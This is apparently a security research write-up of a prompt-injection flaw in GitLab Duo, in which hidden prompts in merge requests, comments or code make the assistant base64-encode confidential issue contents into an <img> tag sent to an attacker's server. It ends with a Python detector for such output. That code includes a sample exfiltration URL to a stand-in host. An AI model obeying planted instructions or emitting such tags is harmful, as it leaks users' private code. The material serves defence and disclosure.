Remote Prompt Injection in GitLab Duo Leads to Source Code Theft


The Legit research team unearthed vulnerabilities in GitLab Duo.

By injecting raw HTML into content that’s rendered live, we could gain control over parts of the page — including the ability to insert elements like <img> tags that trigger automatic HTTP requests to attacker-controlled servers. By embedding a hidden prompt inside a merge request, comment, or even source code, an attacker can instruct Duo to silently retrieve the content of a confidential issue that the victim user has access to, encode it in base64, and embed it within a rendered HTML element such as an <img> tag. By embedding hidden instructions in seemingly harmless project content, we were able to manipulate Duo’s behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes.
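
A defender-side check for the pattern described above, as an added example (not code from the Legit research or from GitLab): it parses an assistant response before it is rendered and reports every auto-loading element that points at an external host, noting whether the URL carries a base64 run that decodes to readable text. The allowlisted host, the sample response and all function names are constructed assumptions.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"gitlab.example.com"}  # assumption: the app's own asset host
AUTO_FETCH = {"img": "src", "iframe": "src", "video": "poster"}  # loaded on render
B64_RUN = re.compile(r"[A-Za-z0-9+/_-]{24,}")


def decodes_to_text(run):
    """True if run is valid base64 (std or URL-safe) of mostly printable bytes."""
    std = run.replace("-", "+").replace("_", "/")
    try:
        raw = base64.b64decode(std + "=" * (-len(std) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    return bool(raw) and printable / len(raw) > 0.9


class ResponseAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        url = dict(attrs).get(AUTO_FETCH.get(tag, "")) or ""
        parts = urlsplit(url.strip())
        if not parts.netloc or parts.hostname in ALLOWED_HOSTS:
            return  # no URL, relative URL, or first-party host
        runs = B64_RUN.findall(parts.path + "?" + parts.query)
        self.findings.append({"tag": tag, "host": parts.hostname,
                              "encoded_payload": any(map(decodes_to_text, runs))})


def audit_response(html):
    """Return one finding per auto-fetching element that targets an external host."""
    auditor = ResponseAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: an assistant reply carrying an injected exfiltration image.
LEAK = base64.b64encode(b"def rotate_keys(): # internal billing logic").decode()
SAMPLE = ('<p>Summary of the merge request.</p><img src="/uploads/diagram.png">'
          f'<img src="https://collector.example.net/p.png?d={LEAK}">')
```

A finding with `encoded_payload` set to `True` is the stronger signal; an external host alone is still worth blocking or logging, since the request itself discloses that the response was rendered.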
